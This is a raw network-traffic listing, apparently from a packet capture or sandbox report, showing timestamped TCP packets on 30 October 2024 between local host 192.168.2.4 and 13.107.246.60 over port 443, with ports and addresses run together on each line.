                                                Oct 30, 2024 00:23:06.950427055 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.950529099 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.950699091 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.950737000 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.973113060 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.973203897 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.973273993 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.973320961 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.973349094 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.973592997 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.973604918 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.973614931 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.973618984 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.974776030 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.974874973 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.974946022 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.975334883 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.975341082 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.981681108 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.981709003 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.981802940 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.982023954 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.982048035 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.982789040 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.982873917 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.982968092 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.983062983 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.983094931 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.083683968 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.084460974 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.084510088 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.085833073 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.085839987 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.218189001 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.218235016 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.218461990 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.219001055 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.219043016 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.226032972 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.226113081 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.226270914 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.226948023 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.226983070 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.684873104 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.685635090 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.685691118 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.686302900 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.686321974 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.697540998 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.699414015 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.699461937 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.700323105 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.700339079 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.720803976 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.721409082 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.721435070 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.722062111 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.722074986 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.731384993 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.731761932 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.731818914 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.732392073 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.732407093 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.824485064 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.824506998 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.824534893 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.824596882 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.824644089 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.824935913 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.824969053 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.824995995 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.825011015 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.828397989 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.828463078 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.828563929 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.828772068 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.828803062 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.833481073 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.833528042 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.833584070 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.833717108 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.833744049 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.833767891 CET58170443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.833781004 CET4435817013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.836584091 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.836639881 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.836736917 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.836905003 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.836949110 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.854300976 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.854376078 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.854445934 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.854603052 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.854621887 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.854645014 CET58171443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.854655981 CET4435817113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.857023001 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.857048988 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.857145071 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.857315063 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.857340097 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.865449905 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.865606070 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.865675926 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.865726948 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.865726948 CET58172443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.865756035 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.865780115 CET4435817213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.867940903 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.867974043 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.868072033 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.868227959 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.868253946 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.955146074 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.955741882 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.955787897 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:07.956176043 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:07.956187010 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.087061882 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.087126970 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.087156057 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.087297916 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.087297916 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.087567091 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.087594032 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.087636948 CET58173443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.087652922 CET4435817313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.091012001 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.091037035 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.091133118 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.091340065 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.091365099 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.569329023 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.570219994 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.570241928 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.570770979 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.570777893 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.579662085 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.580029011 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.580082893 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.580364943 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.580379963 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.592370033 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.592659950 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.592669964 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.593080997 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.593086958 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.608289003 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.608741045 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.608783960 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.609124899 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.609138012 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.702704906 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.702775955 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.702881098 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.706176996 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.706207991 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.706233025 CET58175443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.706249952 CET4435817513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.709708929 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.709780931 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.709896088 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.710011959 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.710038900 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.716578007 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.716619015 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.716672897 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.716845036 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.716845036 CET58174443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.716871977 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.716912985 CET4435817413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.719038010 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.719098091 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.719182014 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.719294071 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.719340086 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.727372885 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.727469921 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.727528095 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.727617025 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.727617025 CET58176443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.727636099 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.727657080 CET4435817613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.730355024 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.730385065 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.730458021 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.730696917 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.730710030 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.740719080 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.740788937 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.740843058 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.740854979 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.740901947 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.740969896 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.741101980 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.741107941 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.741120100 CET58177443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.741127014 CET4435817713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.743866920 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.743894100 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.743964911 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.744148970 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.744174004 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.836949110 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.837330103 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.837349892 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.837765932 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.837778091 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.971364975 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.971431017 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.971543074 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.972146988 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.972179890 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.972284079 CET58178443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.972297907 CET4435817813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.980107069 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.980135918 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:08.980268955 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.980705976 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:08.980720043 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.453711033 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.454777002 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.454879999 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.454910040 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.455615997 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.455666065 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.456459045 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.456471920 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.457062960 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.457079887 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.467822075 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.468542099 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.468588114 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.469690084 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.469702959 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.500593901 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.501384974 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.501401901 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.501935005 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.501945019 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.588483095 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.589883089 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.589992046 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.590168953 CET58180443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.590194941 CET4435818013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.593869925 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.593938112 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.594069004 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.594557047 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.594620943 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.594660997 CET58179443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.594677925 CET4435817913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.597491026 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.597538948 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.597717047 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.598086119 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.598104000 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.600624084 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.600665092 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.600785971 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.601193905 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.601208925 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.602329016 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.602390051 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.602462053 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.602458954 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.602513075 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.602653027 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.602684021 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.602710009 CET58181443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.602725029 CET4435818113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.605052948 CET58186443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.605077982 CET4435818613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.605159044 CET58186443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.605350971 CET58186443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.605370045 CET4435818613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.637505054 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.637671947 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.637777090 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.638168097 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.638190031 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.638221979 CET58182443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.638237000 CET4435818213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.644401073 CET58187443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.644439936 CET4435818713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.644593000 CET58187443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.644969940 CET58187443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.644983053 CET4435818713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.730350971 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.731384039 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.731416941 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.736581087 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.736599922 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.866714954 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.866777897 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.866808891 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.866831064 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.866879940 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.867405891 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.867424011 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.867446899 CET58183443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.867454052 CET4435818313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.872498989 CET58188443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.872576952 CET4435818813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:09.872680902 CET58188443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.872935057 CET58188443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:09.872967005 CET4435818813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.322385073 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.323276997 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.323306084 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.324670076 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.324683905 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.336358070 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.336786032 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.336807966 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.337908030 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.337913990 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.352857113 CET4435818613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.353377104 CET58186443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.353388071 CET4435818613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.354613066 CET58186443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.354619026 CET4435818613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.377500057 CET4435818713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.377933025 CET58187443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.377948046 CET4435818713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.378305912 CET58187443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.378312111 CET4435818713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.453751087 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.453823090 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.453893900 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.454199076 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.454216003 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.454229116 CET58184443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.454235077 CET4435818413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.458084106 CET58189443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.458127022 CET4435818913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.458223104 CET58189443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.458432913 CET58189443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.458447933 CET4435818913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.475672007 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.475758076 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.475788116 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.475810051 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.475868940 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.475898981 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.475914955 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.475924969 CET58185443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.475929022 CET4435818513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.478574991 CET58190443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.478624105 CET4435819013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:10.478707075 CET58190443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:10.478866100 CET58190443192.168.2.413.107.246.60
